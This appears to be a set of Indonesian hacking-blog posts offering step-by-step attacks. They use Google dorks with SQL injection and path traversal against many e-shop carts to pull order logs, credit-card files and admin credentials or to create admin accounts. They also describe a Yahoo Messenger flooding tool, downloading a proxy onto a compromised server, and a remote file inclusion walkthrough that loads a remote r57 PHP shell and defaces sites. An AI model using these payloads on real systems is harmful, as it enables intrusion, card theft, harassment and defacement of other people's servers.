Maka akan muncul tampilan data : admin:p45w0rd
Untuk mengencrypt bisa dari link di bawah ini
http://andi.lp3i.net/tools/asci.htm
Sembunyikan File
Posted OnPerintah ini memeng unik, dan mudah, gue aja baru tau.
Ok langsung aja, kita ambil contoh file gambar.jpg dengan dataku.zip di dalam folder data
buka command prompt, ketik perintah
C:\data>copy /b gambar.jpg + dataku.zip dodol.jpg
gambar.jpg
dataku.zip
1 file(s) copied.
Kita lihat lagi di dalam folder, ada penambahan file dodol.jpg dengan tampilan sama dengan gambar.jpg, tetapi berbeda besar filenya.
File yang pertama adalah file yang akan di masukan file yang lain
Sedangkan File Yang kedua adalah file yang akan dimasukan
File yang di masukan dan file yang akan dimasukan tidak harus file gambar atau jpg dan zip, tetapi bebas apa saja, yang penting dia FIle bukannya ember atau baskom.
Oh iya… kalo mau buka file yang di sisipkan atau di masukan menggunakan program aslinya
Contoh yang dimasukan file zip buka dengan software zip.
selamat mencoba ….Google Attacker
Posted On1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1
2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log
3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb
4. contoh bugs pada bentuk toko sistem :DCShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt
5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/
dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database
access.mdb sebaiknya pake ms access aja)
6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order…
7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
(karena untuk membaca database access.mdb sebaiknya pake ms access
aja)
8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah
dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian
shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%…,
fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password
admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp
11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com Ketik –> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb
12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=…&template…
13. contoh bugs pada bentuk toko sistem :Proddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/
vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb
14. contoh bugs pada bentuk toko sistem :Digishop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection
Usename : ‘or”=”
Password : ‘or”=”
NB: Kebannyakan dari Cara2 diatas ini sudah tidak bisa di pakai lagi karena sudah ditutup bug nya ama web master nya jadi bersabar saja .ini hanya buat tambahan pengetahuan.
Yahoo Boot
Posted OnApakah teman-teman tahu yang namanya yahoo boot? yahoo boot adalah, pesan yang dikirim ke kita secara bertubi-tubi, sehingga bisa membuat YM kita eror dll, jika teman-teman ingin melakukan yahoo boot bisa download program yahoo boot disini
cara menggunakan progoram tersebut
1. download dan ekstrak file yang telah aku berikan
2. buatlah id yahoo sebanyak 3 atau lebih, caranya masuk ke yahoomail.com dan signup
3. setelah id udah dibuat, catat id dan passwordnya
4. buka folder dark bomb, klik notepad YahooIds, isikan id dan dan password yang telah dibuat tadi, contoh cara pengisiannya sudah ada disitu
5. selesai memasukkan id, klik file dark bomb yang bergambarkan orang
6.di Bot# to use pilih brp byak id yang digunakan
6. klik login bots, lihat status dikotak bawah, jika ada status “example” berarti id itu tidak aktif, jika ada status “Has Logged In” maka idnya aktif, misal kita memasukkan id dinotepad di 6 id, dan 3 yg aktif, maka serang udah bisa diluncurkan, itu berarti tiap serangan akan menampilkan tiga pesan sekaligus
7. hapus tulisan “victim goes here”, ganti dengan id targetan kita
8. lancarkan serangan dengan klik buzz boom, pm boom dll
9. untuk pengujian itu berhasil atau tidak, maka coba dulu ke YM kamu, jika tidak berhasil, maka login ulang.
sekian dulu —— semoga bermanfaat
NB: jgn lakukan boot jika bandwith internetnya lambat, karena akan menyebabkan YM kamu yang eror, hihihii
Membuat Proxy di dalam shell
Posted OnSudah ga asing lagi kan ama yang namanya proxy? ya.. proxy adalah sebuah mirror yang penggunaannya ditujukan untuk sebuah privacy ato gampangnya untuk menyamarkan ip address kita. Kali ini saya akan menjelaskan sedikit cara membuat proxy melalui shell dari sebuah web hasil injectkan.
Mari kita mulai..
1. masuk ke shell anda
2. cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
3. jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp
4. wget file proxynya di web geocities saya. commandnya “wget http://www.geocities.com/satan_evilz/proxy.tgz”
5. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://www.geocities.com/satan_evilz/proxy.tgz”
6. kalo ga bisa juga, pakailah script injectkan r57 ato c99 sehingga ada fitur uploadnya. dan uploadlah file psynya dengan fitur tersebut. jika belum punya filenya, donlot aja dari http://www.geocities.com/satan_evilz/proxy.tgz
7. saya anggap udah terupload ke server ya.. maka harus diextract dulu file tersebut dengan command “tar -zvxf proxy.tgz”
8. setelah diextract, masuk ke direktori pro dengan command “cd pro”
9. eksekusi file xh, commandnya adalah “./xh -s ./usr/apache/httpd ./prox -a -s -d9999″ dimana 9999 adalah portnya. anda bisa menggantinya menurut keinginan anda
10. cek hidup atau tidaknya proxy anda di IRC channel yang terdapat bot untuk cek ip. contohnya adalah #balihackerlink, #batamhacker dan masih banyak lagi
11. command untuk ceknya biasanya bervariasi. tapi kurang lebih seperti ini “!pc ip port” contohnya”!ip 66.66.66.66 9999″
12. untuk mengetahui ip dari web inject anda, ketik “/dns domainweb” di IRC. contohnya “/dns ontaganteng.com” maka cek di status box ip yang keluar
Ket:
1. Ini adalah tutor untuk pembuatan proxy pada web hasil inject
2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
3. Semua command di atas tanpa tanda petik dua (”)
cara menggunakan exploit di site http://milw0rm.com
Posted On1. Buka www.milw0rm.com
2. klik Search
3. ketik RFI (Remote File Inclusion)
4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal
5. Buka Google, dan liat Advisor yang kita pilih tersebut
6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak gunakanlah Judul dari Exploit tersebut
7. Setelah dapat hasil dari Google, klik kanan Open NewTab[Nah ini untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB]
8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya
9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang terdapat di advisor
10. Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found.
11. Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut, atau memang beda versi, dan kemungkinan lain
12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error,
13. Ganti command exploit setelah tanda ‘=’[sama dengan] dengan http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif]
14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilakan PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion
15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan Direktory yang memilikik full akses atau -rwxrwxrwx / -rw-rw-rw <– untuk file | drwxrwxrwx / drw-rw-rw <– untuk direktory
16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file index.html versi buatan kamu, atau mengubah index.php or .html dengan versi code kamu jgn lupa nama manadocoding dikibarkan disana…hehe maklum itu forum saya!!!
17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi